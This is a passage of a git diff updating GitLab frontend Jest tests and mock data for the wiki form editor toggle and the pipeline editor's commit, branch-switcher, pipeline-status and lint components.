axios from 'axios'; import MockAdapter from 'axios-mock-adapter'; import { mockTracking } from 'helpers/tracking_helper'; @@ -32,12 +33,15 @@ describe('WikiForm', () => { const findSubmitButton = () => wrapper.findByTestId('wiki-submit-button'); const findCancelButton = () => wrapper.findByRole('link', { name: 'Cancel' }); const findUseNewEditorButton = () => wrapper.findByRole('button', { name: 'Use the new editor' }); + const findToggleEditingModeButton = () => wrapper.findByTestId('toggle-editing-mode-button'); const findDismissContentEditorAlertButton = () => wrapper.findByRole('button', { name: 'Try this later' }); const findSwitchToOldEditorButton = () => wrapper.findByRole('button', { name: 'Switch me back to the classic editor.' }); - const findTitleHelpLink = () => wrapper.findByRole('link', { name: 'More Information.' }); + const findTitleHelpLink = () => wrapper.findByRole('link', { name: 'Learn more.' }); const findMarkdownHelpLink = () => wrapper.findByTestId('wiki-markdown-help-link'); + const findContentEditor = () => wrapper.findComponent(ContentEditor); + const findClassicEditor = () => wrapper.findComponent(MarkdownField); const setFormat = (value) => { const format = findFormat(); @@ -73,18 +77,24 @@ describe('WikiForm', () => { path: '/project/path/-/wikis/home', }; - function createWrapper(persisted = false, { pageInfo } = {}) { + const formatOptions = { + Markdown: 'markdown', + RDoc: 'rdoc', + AsciiDoc: 'asciidoc', + Org: 'org', + }; + + function createWrapper( + persisted = false, + { pageInfo, glFeatures = { wikiSwitchBetweenContentEditorRawMarkdown: false } } = {}, + ) { wrapper = extendedWrapper( mount( WikiForm, { provide: { - formatOptions: { - Markdown: 'markdown', - RDoc: 'rdoc', - AsciiDoc: 'asciidoc', - Org: 'org', - }, + formatOptions, + glFeatures, pageInfo: { ...(persisted ? pageInfoPersisted : pageInfoNew), ...pageInfo, @@ -96,6 +106,27 @@ describe('WikiForm', () => { ); } + const createShallowWrapper = ( + persisted = false, + { pageInfo, glFeatures = { wikiSwitchBetweenContentEditorRawMarkdown: false } } = {}, + ) => { + wrapper = extendedWrapper( + shallowMount(WikiForm, { + provide: { + formatOptions, + glFeatures, + pageInfo: { + ...(persisted ? pageInfoPersisted : pageInfoNew), + ...pageInfo, + }, + }, + stubs: { + MarkdownField, + }, + }), + ); + }; + beforeEach(() => { trackingSpy = mockTracking(undefined, null, jest.spyOn); mock = new MockAdapter(axios); @@ -193,14 +224,13 @@ describe('WikiForm', () => { }); describe('when wiki content is updated', () => { - beforeEach(() => { + beforeEach(async () => { createWrapper(true); const input = findContent(); input.setValue(' Lorem ipsum dolar sit! '); - input.element.dispatchEvent(new Event('input')); - return wrapper.vm.$nextTick(); + await input.trigger('input'); }); it('sets before unload warning', () => { @@ -279,6 +309,100 @@ describe('WikiForm', () => { ); }); + describe('when wikiSwitchBetweenContentEditorRawMarkdown feature flag is not enabled', () => { + beforeEach(() => { + createShallowWrapper(true, { + glFeatures: { wikiSwitchBetweenContentEditorRawMarkdown: false }, + }); + }); + + it('hides toggle editing mode button', () => { + expect(findToggleEditingModeButton().exists()).toBe(false); + }); + }); + + describe('when wikiSwitchBetweenContentEditorRawMarkdown feature flag is enabled', () => { + beforeEach(() => { + createShallowWrapper(true, { + glFeatures: { wikiSwitchBetweenContentEditorRawMarkdown: true }, + }); + }); + + it('hides gl-alert containing "use new editor" button', () => { + expect(findUseNewEditorButton().exists()).toBe(false); + }); + + it('displays toggle editing mode button', () => { + expect(findToggleEditingModeButton().exists()).toBe(true); + }); + + describe('when content editor is not active', () => { + it('displays "Edit rich text" label in the toggle editing mode button', () => { + expect(findToggleEditingModeButton().text()).toBe('Edit rich text'); + }); + + describe('when clicking the toggle editing mode button', () => { + beforeEach(() => { + findToggleEditingModeButton().vm.$emit('click'); + }); + + it('hides the classic editor', () => { + expect(findClassicEditor().exists()).toBe(false); + }); + + it('hides the content editor', () => { + expect(findContentEditor().exists()).toBe(true); + }); + }); + }); + + describe('when content editor is active', () => { + let mockContentEditor; + + beforeEach(() => { + mockContentEditor = { + getSerializedContent: jest.fn(), + setSerializedContent: jest.fn(), + }; + + findToggleEditingModeButton().vm.$emit('click'); + }); + + it('hides switch to old editor button', () => { + expect(findSwitchToOldEditorButton().exists()).toBe(false); + }); + + it('displays "Edit source" label in the toggle editing mode button', () => { + expect(findToggleEditingModeButton().text()).toBe('Edit source'); + }); + + describe('when clicking the toggle editing mode button', () => { + const contentEditorFakeSerializedContent = 'fake content'; + + beforeEach(() => { + mockContentEditor.getSerializedContent.mockReturnValueOnce( + contentEditorFakeSerializedContent, + ); + + findContentEditor().vm.$emit('initialized', mockContentEditor); + findToggleEditingModeButton().vm.$emit('click'); + }); + + it('hides the content editor', () => { + expect(findContentEditor().exists()).toBe(false); + }); + + it('displays the classic editor', () => { + expect(findClassicEditor().exists()).toBe(true); + }); + + it('updates the classic editor content field', () => { + expect(findContent().element.value).toBe(contentEditorFakeSerializedContent); + }); + }); + }); + }); + describe('wiki content editor', () => { beforeEach(() => { createWrapper(true); @@ -306,8 +430,8 @@ describe('WikiForm', () => { }); const assertOldEditorIsVisible = () => { - expect(wrapper.findComponent(ContentEditor).exists()).toBe(false); - expect(wrapper.findComponent(MarkdownField).exists()).toBe(true); + expect(findContentEditor().exists()).toBe(false); + expect(findClassicEditor().exists()).toBe(true); expect(findSubmitButton().props('disabled')).toBe(false); expect(wrapper.text()).not.toContain( @@ -376,10 +500,6 @@ describe('WikiForm', () => { findUseNewEditorButton().trigger('click'); }); - it('shows a loading indicator for the rich text editor', () => { - expect(wrapper.findComponent(GlLoadingIcon).exists()).toBe(true); - }); - it('shows a tip to send feedback', () => { expect(wrapper.text()).toContain('Tell us your experiences with the new Markdown editor'); }); @@ -412,16 +532,8 @@ describe('WikiForm', () => { }); describe('when wiki content is updated', () => { - beforeEach(async () => { - // wait for content editor to load - await waitForPromises(); - - wrapper.vm.contentEditor.tiptapEditor.commands.setContent( - '<p>hello __world__ from content editor</p>', - true, - ); - - return wrapper.vm.$nextTick(); + beforeEach(() => { + findContentEditor().vm.$emit('change', { empty: false }); }); it('sets before unload warning', () => { @@ -432,7 +544,7 @@ describe('WikiForm', () => { it('unsets before unload warning on form submit', async () => { triggerFormSubmit(); - await wrapper.vm.$nextTick(); + await nextTick(); const e = dispatchBeforeUnload(); expect(e.preventDefault).not.toHaveBeenCalled(); @@ -450,8 +562,8 @@ describe('WikiForm', () => { expect(trackingSpy).toHaveBeenCalledWith(undefined, WIKI_FORMAT_UPDATED_ACTION, { label: WIKI_FORMAT_LABEL, - value: findFormat().element.value, extra: { + value: findFormat().element.value, old_format: pageInfoPersisted.format, project_path: pageInfoPersisted.path, }, diff --git a/spec/frontend/pipeline_editor/components/commit/commit_form_spec.js b/spec/frontend/pipeline_editor/components/commit/commit_form_spec.js index 23219042008..7244a179820 100644 --- a/spec/frontend/pipeline_editor/components/commit/commit_form_spec.js +++ b/spec/frontend/pipeline_editor/components/commit/commit_form_spec.js @@ -1,3 +1,4 @@ +import { nextTick } from 'vue'; import { GlFormInput, GlFormTextarea } from '@gitlab/ui'; import { shallowMount, mount } from '@vue/test-utils'; @@ -32,7 +33,6 @@ describe('Pipeline Editor | Commit Form', () => { afterEach(() => { wrapper.destroy(); - wrapper = null; }); describe('when the form is displayed', () => { @@ -78,7 +78,7 @@ describe('Pipeline Editor | Commit Form', () => { it('emits an event when the form resets', () => { findCancelBtn().trigger('click'); - expect(wrapper.emitted('cancel')).toHaveLength(1); + expect(wrapper.emitted('resetContent')).toHaveLength(1); }); }); @@ -121,7 +121,7 @@ describe('Pipeline Editor | Commit Form', () => { beforeEach(async () => { createComponent(); wrapper.setProps({ scrollToCommitForm: true }); - await wrapper.vm.$nextTick(); + await nextTick(); }); it('scrolls into view', () => { diff --git a/spec/frontend/pipeline_editor/components/commit/commit_section_spec.js b/spec/frontend/pipeline_editor/components/commit/commit_section_spec.js index efc345d8877..bc77b7045eb 100644 --- a/spec/frontend/pipeline_editor/components/commit/commit_section_spec.js +++ b/spec/frontend/pipeline_editor/components/commit/commit_section_spec.js @@ -1,5 +1,7 @@ +import VueApollo from 'vue-apollo'; import { GlFormTextarea, GlFormInput, GlLoadingIcon } from '@gitlab/ui'; -import { mount } from '@vue/test-utils'; +import { createLocalVue, mount } from '@vue/test-utils'; +import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; import { objectToQuery, redirectTo } from '~/lib/utils/url_utility'; import CommitForm from '~/pipeline_editor/components/commit/commit_form.vue'; @@ -10,18 +12,22 @@ import { COMMIT_SUCCESS, } from '~/pipeline_editor/constants'; import commitCreate from '~/pipeline_editor/graphql/mutations/commit_ci_file.mutation.graphql'; +import updatePipelineEtag from '~/pipeline_editor/graphql/mutations/client/update_pipeline_etag.mutation.graphql'; import { mockCiConfigPath, mockCiYml, + mockCommitCreateResponse, + mockCommitCreateResponseNewEtag, mockCommitSha, - mockCommitNextSha, mockCommitMessage, mockDefaultBranch, mockProjectFullPath, mockNewMergeRequestPath, } from '../../mock_data'; +const localVue = createLocalVue(); + jest.mock('~/lib/utils/url_utility', () => ({ redirectTo: jest.fn(), refreshCurrentPage: jest.fn(), @@ -47,7 +53,8 @@ const mockProvide = { describe('Pipeline Editor | Commit section', () => { let wrapper; - let mockMutate; + let mockApollo; + const mockMutateCommitData = jest.fn(); const defaultProps = { ciFileContent: mockCiYml, @@ -55,18 +62,7 @@ describe('Pipeline Editor | Commit section', () => { isNewCiConfigFile: false, }; - const createComponent = ({ props = {}, options = {}, provide = {} } = {}) => { - mockMutate = jest.fn().mockResolvedValue({ - data: { - commitCreate: { - errors: [], - commit: { - sha: mockCommitNextSha, - }, - }, - }, - }); - + const createComponent = ({ apolloConfig = {}, props = {}, options = {}, provide = {} } = {}) => { wrapper = mount(CommitSection, { propsData: { ...defaultProps, ...props }, provide: { ...mockProvide, ...provide }, @@ -75,16 +71,25 @@ describe('Pipeline Editor | Commit section', () => { currentBranch: mockDefaultBranch, }; }, - mocks: { - $apollo: { - mutate: mockMutate, - }, - }, attachTo: document.body, + ...apolloConfig, ...options, }); }; + const createComponentWithApollo = (options) => { + const handlers = [[commitCreate, mockMutateCommitData]]; + localVue.use(VueApollo); + mockApollo = createMockApollo(handlers); + + const apolloConfig = { + localVue, + apolloProvider: mockApollo, + }; + + createComponent({ ...options, apolloConfig }); + }; + const findCommitForm = () => wrapper.findComponent(CommitForm); const findCommitBtnLoadingIcon = () => wrapper.find('[type="submit"]').findComponent(GlLoadingIcon); @@ -103,72 +108,54 @@ describe('Pipeline Editor | Commit section', () => { await waitForPromises(); }; - const cancelCommitForm = async () => { - const findCancelBtn = () => wrapper.find('[type="reset"]'); - await findCancelBtn().trigger('click'); - }; - afterEach(() => { - mockMutate.mockReset(); wrapper.destroy(); }); describe('when the user commits a new file', () => { beforeEach(async () => { - createComponent({ props: { isNewCiConfigFile: true } }); + mockMutateCommitData.mockResolvedValue(mockCommitCreateResponse); + createComponentWithApollo({ props: { isNewCiConfigFile: true } }); await submitCommit(); }); it('calls the mutation with the CREATE action', () => { - // the extra calls are for updating client queries (currentBranch and lastCommitBranch) - expect(mockMutate).toHaveBeenCalledTimes(3); - expect(mockMutate).toHaveBeenCalledWith({ - mutation: commitCreate, - update: expect.any(Function), - variables: { - ...mockVariables, - action: COMMIT_ACTION_CREATE, - branch: mockDefaultBranch, - }, + expect(mockMutateCommitData).toHaveBeenCalledTimes(1); + expect(mockMutateCommitData).toHaveBeenCalledWith({ + ...mockVariables, + action: COMMIT_ACTION_CREATE, + branch: mockDefaultBranch, }); }); }); describe('when the user commits an update to an existing file', () => { beforeEach(async () => { - createComponent(); + createComponentWithApollo(); await submitCommit(); }); it('calls the mutation with the UPDATE action', () => { - expect(mockMutate).toHaveBeenCalledTimes(3); - expect(mockMutate).toHaveBeenCalledWith({ - mutation: commitCreate, - update: expect.any(Function), - variables: { - ...mockVariables, - action: COMMIT_ACTION_UPDATE, - branch: mockDefaultBranch, - }, + expect(mockMutateCommitData).toHaveBeenCalledTimes(1); + expect(mockMutateCommitData).toHaveBeenCalledWith({ + ...mockVariables, + action: COMMIT_ACTION_UPDATE, + branch: mockDefaultBranch, }); }); }); describe('when the user commits changes to the current branch', () => { beforeEach(async () => { - createComponent(); + createComponentWithApollo(); await submitCommit(); }); it('calls the mutation with the current branch', () => { - expect(mockMutate).toHaveBeenCalledTimes(3); - expect(mockMutate).toHaveBeenCalledWith({ - mutation: commitCreate, - update: expect.any(Function), - variables: { - ...mockVariables, - branch: mockDefaultBranch, - }, + expect(mockMutateCommitData).toHaveBeenCalledTimes(1); + expect(mockMutateCommitData).toHaveBeenCalledWith({ + ...mockVariables, + branch: mockDefaultBranch, }); }); @@ -188,14 +175,10 @@ describe('Pipeline Editor | Commit section', () => { it('a second commit submits the latest sha, keeping the form updated', async () => { await submitCommit(); - expect(mockMutate).toHaveBeenCalledTimes(6); - expect(mockMutate).toHaveBeenCalledWith({ - mutation: commitCreate, - update: expect.any(Function), - variables: { - ...mockVariables, - branch: mockDefaultBranch, - }, + expect(mockMutateCommitData).toHaveBeenCalledTimes(2); + expect(mockMutateCommitData).toHaveBeenCalledWith({ + ...mockVariables, + branch: mockDefaultBranch, }); }); }); @@ -204,20 +187,16 @@ describe('Pipeline Editor | Commit section', () => { const newBranch = 'new-branch'; beforeEach(async () => { - createComponent(); + createComponentWithApollo(); await submitCommit({ branch: newBranch, }); }); it('calls the mutation with the new branch', () => { - expect(mockMutate).toHaveBeenCalledWith({ - mutation: commitCreate, - update: expect.any(Function), - variables: { - ...mockVariables, - branch: newBranch, - }, + expect(mockMutateCommitData).toHaveBeenCalledWith({ + ...mockVariables, + branch: newBranch, }); }); @@ -230,7 +209,7 @@ describe('Pipeline Editor | Commit section', () => { const newBranch = 'new-branch'; beforeEach(async () => { - createComponent(); + createComponentWithApollo(); await submitCommit({ branch: newBranch, openMergeRequest: true, @@ -249,11 +228,11 @@ describe('Pipeline Editor | Commit section', () => { describe('when the commit is ocurring', () => { beforeEach(() => { - createComponent(); + createComponentWithApollo(); }); it('shows a saving state', async () => { - mockMutate.mockImplementationOnce(() => { + mockMutateCommitData.mockImplementationOnce(() => { expect(findCommitBtnLoadingIcon().exists()).toBe(true); return Promise.resolve(); }); @@ -266,15 +245,23 @@ describe('Pipeline Editor | Commit section', () => { }); }); - describe('when the commit form is cancelled', () => { + describe('when the commit returns a different etag path', () => { beforeEach(async () => { - createComponent(); + createComponentWithApollo(); + jest.spyOn(wrapper.vm.$apollo, 'mutate'); + mockMutateCommitData.mockResolvedValue(mockCommitCreateResponseNewEtag); + await submitCommit(); }); - it('emits an event so that it cab be reseted', async () => { - await cancelCommitForm(); - - expect(wrapper.emitted('resetContent')).toHaveLength(1); + it('calls the client mutation to update the etag', () => { + // 1:Commit submission, 2:etag update, 3:currentBranch update, 4:lastCommit update + expect(wrapper.vm.$apollo.mutate).toHaveBeenCalledTimes(4); + expect(wrapper.vm.$apollo.mutate).toHaveBeenNthCalledWith(2, { + mutation: updatePipelineEtag, + variables: { + pipelineEtag: mockCommitCreateResponseNewEtag.data.commitCreate.commitPipelinePath, + }, + }); }); }); diff --git a/spec/frontend/pipeline_editor/components/editor/text_editor_spec.js b/spec/frontend/pipeline_editor/components/editor/text_editor_spec.js index a43da4b0f19..cab4810cbf1 100644 --- a/spec/frontend/pipeline_editor/components/editor/text_editor_spec.js +++ b/spec/frontend/pipeline_editor/components/editor/text_editor_spec.js @@ -1,7 +1,6 @@ import { shallowMount } from '@vue/test-utils'; import { EDITOR_READY_EVENT } from '~/editor/constants'; -import { SourceEditorExtension } from '~/editor/extensions/source_editor_extension_base'; import TextEditor from '~/pipeline_editor/components/editor/text_editor.vue'; import { mockCiConfigPath, @@ -59,10 +58,6 @@ describe('Pipeline Editor | Text editor component', () => { const findEditor = () => wrapper.findComponent(MockSourceEditor); - beforeEach(() => { - SourceEditorExtension.deferRerender = jest.fn(); - }); - afterEach(() => { wrapper.destroy(); diff --git a/spec/frontend/pipeline_editor/components/file-nav/branch_switcher_spec.js b/spec/frontend/pipeline_editor/components/file-nav/branch_switcher_spec.js index 6532c4e289d..ab9027a56a4 100644 --- a/spec/frontend/pipeline_editor/components/file-nav/branch_switcher_spec.js +++ b/spec/frontend/pipeline_editor/components/file-nav/branch_switcher_spec.js @@ -11,7 +11,7 @@ import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; import BranchSwitcher from '~/pipeline_editor/components/file_nav/branch_switcher.vue'; import { DEFAULT_FAILURE } from '~/pipeline_editor/constants'; -import getAvailableBranchesQuery from '~/pipeline_editor/graphql/queries/available_branches.graphql'; +import getAvailableBranchesQuery from '~/pipeline_editor/graphql/queries/available_branches.query.graphql'; import { mockBranchPaginationLimit, mockDefaultBranch, @@ -22,7 +22,6 @@ import { mockTotalBranches, mockTotalBranchResults, mockTotalSearchResults, - mockNewBranch, } from '../../mock_data'; const localVue = createLocalVue(); @@ -32,18 +31,14 @@ describe('Pipeline editor branch switcher', () => { let wrapper; let mockApollo; let mockAvailableBranchQuery; - let mockCurrentBranchQuery; - let mockLastCommitBranchQuery; - - const createComponent = ( - { currentBranch, isQueryLoading, mountFn, options, props } = { - currentBranch: mockDefaultBranch, - hasUnsavedChanges: false, - isQueryLoading: false, - mountFn: shallowMount, - options: {}, - }, - ) => { + + const createComponent = ({ + currentBranch = mockDefaultBranch, + isQueryLoading = false, + mountFn = shallowMount, + options = {}, + props = {}, + } = {}) => { wrapper = mountFn(BranchSwitcher, { propsData: { ...props, @@ -74,17 +69,7 @@ describe('Pipeline editor branch switcher', () => { const createComponentWithApollo = ({ mountFn = shallowMount, props = {} } = {}) => { const handlers = [[getAvailableBranchesQuery, mockAvailableBranchQuery]]; - const resolvers = { - Query: { - currentBranch() { - return mockCurrentBranchQuery(); - }, - lastCommitBranch() { - return mockLastCommitBranchQuery(); - }, - }, - }; - mockApollo = createMockApollo(handlers, resolvers); + mockApollo = createMockApollo(handlers); createComponent({ mountFn, @@ -104,22 +89,12 @@ describe('Pipeline editor branch switcher', () => { const findInfiniteScroll = () => wrapper.findComponent(GlInfiniteScroll); const defaultBranchInDropdown = () => findDropdownItems().at(0); - const setMockResolvedValues = ({ availableBranches, currentBranch, lastCommitBranch }) => { - if (availableBranches) { - mockAvailableBranchQuery.mockResolvedValue(availableBranches); - } - - if (currentBranch) { - mockCurrentBranchQuery.mockResolvedValue(currentBranch); - } - - mockLastCommitBranchQuery.mockResolvedValue(lastCommitBranch || ''); + const setAvailableBranchesMock = (availableBranches) => { + mockAvailableBranchQuery.mockResolvedValue(availableBranches); }; beforeEach(() => { mockAvailableBranchQuery = jest.fn(); - mockCurrentBranchQuery = jest.fn(); - mockLastCommitBranchQuery = jest.fn(); }); afterEach(() => { @@ -148,10 +123,7 @@ describe('Pipeline editor branch switcher', () => { describe('after querying', () => { beforeEach(async () => { - setMockResolvedValues({ - availableBranches: mockProjectBranches, - currentBranch: mockDefaultBranch, - }); + setAvailableBranchesMock(mockProjectBranches); createComponentWithApollo({ mountFn: mount }); await waitForPromises(); }); @@ -180,10 +152,7 @@ describe('Pipeline editor branch switcher', () => { describe('on fetch error', () => { beforeEach(async () => { - setMockResolvedValues({ - availableBranches: new Error(), - currentBranch: mockDefaultBranch, - }); + setAvailableBranchesMock(new Error()); createComponentWithApollo(); await waitForPromises(); }); @@ -200,10 +169,7 @@ describe('Pipeline editor branch switcher', () => { describe('when switching branches', () => { beforeEach(async () => { jest.spyOn(window.history, 'pushState').mockImplementation(() => {}); - setMockResolvedValues({ - availableBranches: mockProjectBranches, - currentBranch: mockDefaultBranch, - }); + setAvailableBranchesMock(mockProjectBranches); createComponentWithApollo({ mountFn: mount }); await waitForPromises(); }); @@ -271,10 +237,7 @@ describe('Pipeline editor branch switcher', () => { describe('when searching', () => { beforeEach(async () => { - setMockResolvedValues({ - availableBranches: mockProjectBranches, - currentBranch: mockDefaultBranch, - }); + setAvailableBranchesMock(mockProjectBranches); createComponentWithApollo({ mountFn: mount }); await waitForPromises(); }); @@ -374,10 +337,7 @@ describe('Pipeline editor branch switcher', () => { describe('when scrolling to the bottom of the list', () => { beforeEach(async () => { - setMockResolvedValues({ - availableBranches: mockProjectBranches, - currentBranch: mockDefaultBranch, - }); + setAvailableBranchesMock(mockProjectBranches); createComponentWithApollo(); await waitForPromises(); }); @@ -433,35 +393,4 @@ describe('Pipeline editor branch switcher', () => { }); }); }); - - describe('when committing a new branch', () => { - const createNewBranch = async () => { - setMockResolvedValues({ - currentBranch: mockNewBranch, - lastCommitBranch: mockNewBranch, - }); - await wrapper.vm.$apollo.queries.currentBranch.refetch(); - await wrapper.vm.$apollo.queries.lastCommitBranch.refetch(); - }; - - beforeEach(async () => { - setMockResolvedValues({ - availableBranches: mockProjectBranches, - currentBranch: mockDefaultBranch, - }); - createComponentWithApollo({ mountFn: mount }); - await waitForPromises(); - await createNewBranch(); - }); - - it('sets new branch as current branch', () => { - expect(defaultBranchInDropdown().text()).toBe(mockNewBranch); - expect(defaultBranchInDropdown().props('isChecked')).toBe(true); - }); - - it('adds new branch to branch switcher', () => { - expect(defaultBranchInDropdown().text()).toBe(mockNewBranch); - expect(findDropdownItems()).toHaveLength(mockTotalBranchResults + 1); - }); - }); }); diff --git a/spec/frontend/pipeline_editor/components/header/pipeline_status_spec.js b/spec/frontend/pipeline_editor/components/header/pipeline_status_spec.js index 29ab52bde8f..c101b1d21c7 100644 --- a/spec/frontend/pipeline_editor/components/header/pipeline_status_spec.js +++ b/spec/frontend/pipeline_editor/components/header/pipeline_status_spec.js @@ -4,7 +4,7 @@ import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; import PipelineStatus, { i18n } from '~/pipeline_editor/components/header/pipeline_status.vue'; -import getPipelineQuery from '~/pipeline_editor/graphql/queries/client/pipeline.graphql'; +import getPipelineQuery from '~/pipeline_editor/graphql/queries/pipeline.query.graphql'; import PipelineEditorMiniGraph from '~/pipeline_editor/components/header/pipeline_editor_mini_graph.vue'; import { mockCommitSha, mockProjectPipeline, mockProjectFullPath } from '../../mock_data'; @@ -39,8 +39,6 @@ describe('Pipeline Status', () => { const findPipelineId = () => wrapper.find('[data-testid="pipeline-id"]'); const findPipelineCommit = () => wrapper.find('[data-testid="pipeline-commit"]'); const findPipelineErrorMsg = () => wrapper.find('[data-testid="pipeline-error-msg"]'); - const findPipelineNotTriggeredErrorMsg = () => - wrapper.find('[data-testid="pipeline-not-triggered-error-msg"]'); const findPipelineLoadingMsg = () => wrapper.find('[data-testid="pipeline-loading-msg"]'); const findPipelineViewBtn = () => wrapper.find('[data-testid="pipeline-view-btn"]'); const findStatusIcon = () => wrapper.find('[data-testid="pipeline-status-icon"]'); @@ -119,8 +117,7 @@ describe('Pipeline Status', () => { await waitForPromises(); }); - it('renders api error', () => { - expect(findPipelineNotTriggeredErrorMsg().exists()).toBe(false); + it('renders error', () => { expect(findIcon().attributes('name')).toBe('warning-solid'); expect(findPipelineErrorMsg().text()).toBe(i18n.fetchError); }); @@ -132,22 +129,5 @@ describe('Pipeline Status', () => { expect(findPipelineViewBtn().exists()).toBe(false); }); }); - - describe('when pipeline is null', () => { - beforeEach(() => { - mockPipelineQuery.mockResolvedValue({ - data: { project: { pipeline: null } }, - }); - - createComponentWithApollo(); - waitForPromises(); - }); - - it('renders pipeline not triggered error', () => { - expect(findPipelineErrorMsg().exists()).toBe(false); - expect(findIcon().attributes('name')).toBe('information-o'); - expect(findPipelineNotTriggeredErrorMsg().text()).toBe(i18n.pipelineNotTriggeredMsg); - }); - }); }); }); diff --git a/spec/frontend/pipeline_editor/components/lint/ci_lint_results_spec.js b/spec/frontend/pipeline_editor/components/lint/ci_lint_results_spec.js index 5fc0880b09e..ae19ed9ab02 100644 --- a/spec/frontend/pipeline_editor/components/lint/ci_lint_results_spec.js +++ b/spec/frontend/pipeline_editor/components/lint/ci_lint_results_spec.js @@ -1,4 +1,4 @@ -import { GlTable, GlLink } from '@gitlab/ui'; +import { GlTableLite, GlLink } from '@gitlab/ui'; import { shallowMount, mount } from '@vue/test-utils'; import { capitalizeFirstCharacter } from '~/lib/utils/text_utility'; import CiLintResults from '~/pipeline_editor/components/lint/ci_lint_results.vue'; @@ -24,7 +24,7 @@ describe('CI Lint Results', () => { }); }; - const findTable = () => wrapper.find(GlTable); + const findTable = () => wrapper.find(GlTableLite); const findByTestId = (selector) => () => wrapper.find(`[data-testid="ci-lint-${selector}"]`); const findAllByTestId = (selector) => () => wrapper.findAll(`[data-testid="ci-lint-${selector}"]`); diff --git a/spec/frontend/pipeline_editor/mock_data.js b/spec/frontend/pipeline_editor/mock_data.js index 1bfc5c3b93d..fc2cbdeda0a 100644 --- a/spec/frontend/pipeline_editor/mock_data.js +++ b/spec/frontend/pipeline_editor/mock_data.js @@ -39,6 +39,7 @@ job_build: export const mockCiTemplateQueryResponse = { data: { project: { + id: 'project-1', ciTemplate: { content: mockCiYml, }, @@ -48,19 +49,22 @@ export const mockCiTemplateQueryResponse = { export const mockBlobContentQueryResponse = { data: { - project: { repository: { blobs: { nodes: [{ rawBlob: mockCiYml }] } } }, + project: { + id: 'project-1', + repository: { blobs: { nodes: [{ id: 'blob-1', rawBlob: mockCiYml }] } }, + }, }, }; export const mockBlobContentQueryResponseNoCiFile = { data: { - project: { repository: { blobs: { nodes: [] } } }, + project: { id: 'project-1', repository: { blobs: { nodes: [] } } }, }, }; export const mockBlobContentQueryResponseEmptyCiFile = { data: { - project: { repository: { blobs: { nodes: [{ rawBlob: '' }] } } }, + project: { id: 'project-1', repository: { blobs: { nodes: [{ rawBlob: '' }] } } }, }, }; @@ -93,6 +97,7 @@ export const mockCiConfigQueryResponse = { groups: { nodes: [ { + id: 'group-1', name: 'job_test_1', size: 1, jobs: { @@ -108,6 +113,7 @@ export const mockCiConfigQueryResponse = { __typename: 'CiConfigGroup', }, { + id: 'group-2', name: 'job_test_2', size: 1, jobs: { @@ -170,9 +176,11 @@ export const mergeUnwrappedCiConfig = (mergedConfig) => { export const mockCommitShaResults = { data: { project: { + id: '1', repository: { tree: { lastCommit: { + id: 'commit-1', sha: mockCommitSha, }, }, @@ -184,9 +192,11 @@ export const mockCommitShaResults = { export const mockNewCommitShaResults = { data: { project: { + id: '1', repository: { tree: { lastCommit: { + id: 'commit-1', sha: 'eeff1122', }, }, @@ -198,9 +208,11 @@ export const mockNewCommitShaResults = { export const mockEmptyCommitShaResults = { data: { project: { + id: '1', repository: { tree: { lastCommit: { + id: 'commit-1', sha: '', }, }, @@ -212,6 +224,7 @@ export const mockEmptyCommitShaResults = { export const mockProjectBranches = { data: { project: { + id: '1', repository: { branchNames: [ 'main', @@ -236,6 +249,7 @@ export const mockTotalBranchResults = export const mockSearchBranches = { data: { project: { + id: '1', repository: { branchNames: ['test', 'better-feature', 'update-ci', 'test-merge-request'], }, @@ -248,6 +262,7 @@ export const mockTotalSearchResults = mockSearchBranches.data.project.repository export const mockEmptySearchBranches = { data: { project: { + id: '1', repository: { branchNames: [], }, @@ -284,16 +299,19 @@ export const mockProjectPipeline = ({ hasStages = true } = {}) => { : null; return { + id: '1', pipeline: { id: 'gid://gitlab/Ci::Pipeline/118', iid: '28', shortSha: mockCommitSha, status: 'SUCCESS', commit: { + id: 'commit-1', title: 'Update .gitlabe-ci.yml', webPath: '/-/commit/aabbccdd', }, detailedStatus: { + id: 'status-1', detailsPath: '/root/sample-ci-project/-/pipelines/118', group: 'success', icon: 'status_success', @@ -453,3 +471,33 @@ export const mockErrors = [ export const mockWarnings = [ '"jobs:multi_project_job may allow multiple pipelines to run for a single action due to `rules:when` clause with no `workflow:rules` - read more: https://docs.gitlab.com/ee/ci/troubleshooting.html#pipeline-warnings"', ]; + +export const mockCommitCreateResponse = { + data: { + commitCreate: { + __typename: 'CommitCreatePayload', + errors: [], + commit: { + __typename: 'Commit', + id: 'commit-1', + sha: mockCommitNextSha, + }, + commitPipelinePath: '', + }, + }, +}; + +export const mockCommitCreateResponseNewEtag = { + data: { + commitCreate: { + __typename: 'CommitCreatePayload', + errors: [], + commit: { + __typename: 'Commit', + id: 'commit-2', + sha: mockCommitNextSha, + }, + commitPipelinePath: '/api/graphql:pipelines/sha/550ceace1acd373c84d02bd539cb9d4614f786db', + }, + }, +}; diff --git a/spec/frontend/pipeline_editor/pipeline_editor_app_spec.js b/spec/frontend/pipeline_editor/pipeline_editor_app_spec.js index f6afef595c6..09d7d4f7ca6 100644 --- a/spec/frontend/pipeline_editor/pipeline_editor_app_spec.js +++ b/spec/frontend/pipeline_editor/pipeline_editor_app_spec.js @@ -8,13 +8,12 @@ import waitForPromises from 'helpers/wait_for_promises'; import PipelineEditorTabs from '~/pipeline_editor/components/pipeline_editor_tabs.vue'; import PipelineEditorEmptyState from '~/pipeline_editor/components/ui/pipeline_editor_empty_state.vue'; import PipelineEditorMessages from '~/pipeline_editor/components/ui/pipeline_editor_messages.vue'; -import { COMMIT_SUCCESS, COMMIT_FAILURE } from '~/pipeline_editor/constants'; -import getBlobContent from '~/pipeline_editor/graphql/queries/blob_content.graphql'; -import getCiConfigData from '~/pipeline_editor/graphql/queries/ci_config.graphql'; +import { COMMIT_SUCCESS, COMMIT_FAILURE, LOAD_FAILURE_UNKNOWN } from '~/pipeline_editor/constants'; +import getBlobContent from '~/pipeline_editor/graphql/queries/blob_content.query.graphql'; +import getCiConfigData from '~/pipeline_editor/graphql/queries/ci_config.query.graphql'; import getTemplate from '~/pipeline_editor/graphql/queries/get_starter_template.query.graphql'; import getLatestCommitShaQuery from '~/pipeline_editor/graphql/queries/latest_commit_sha.query.graphql'; - -import getPipelineQuery from '~/pipeline_editor/graphql/queries/client/pipeline.graphql'; +import getPipelineQuery from '~/pipeline_editor/graphql/queries/pipeline.query.graphql'; import 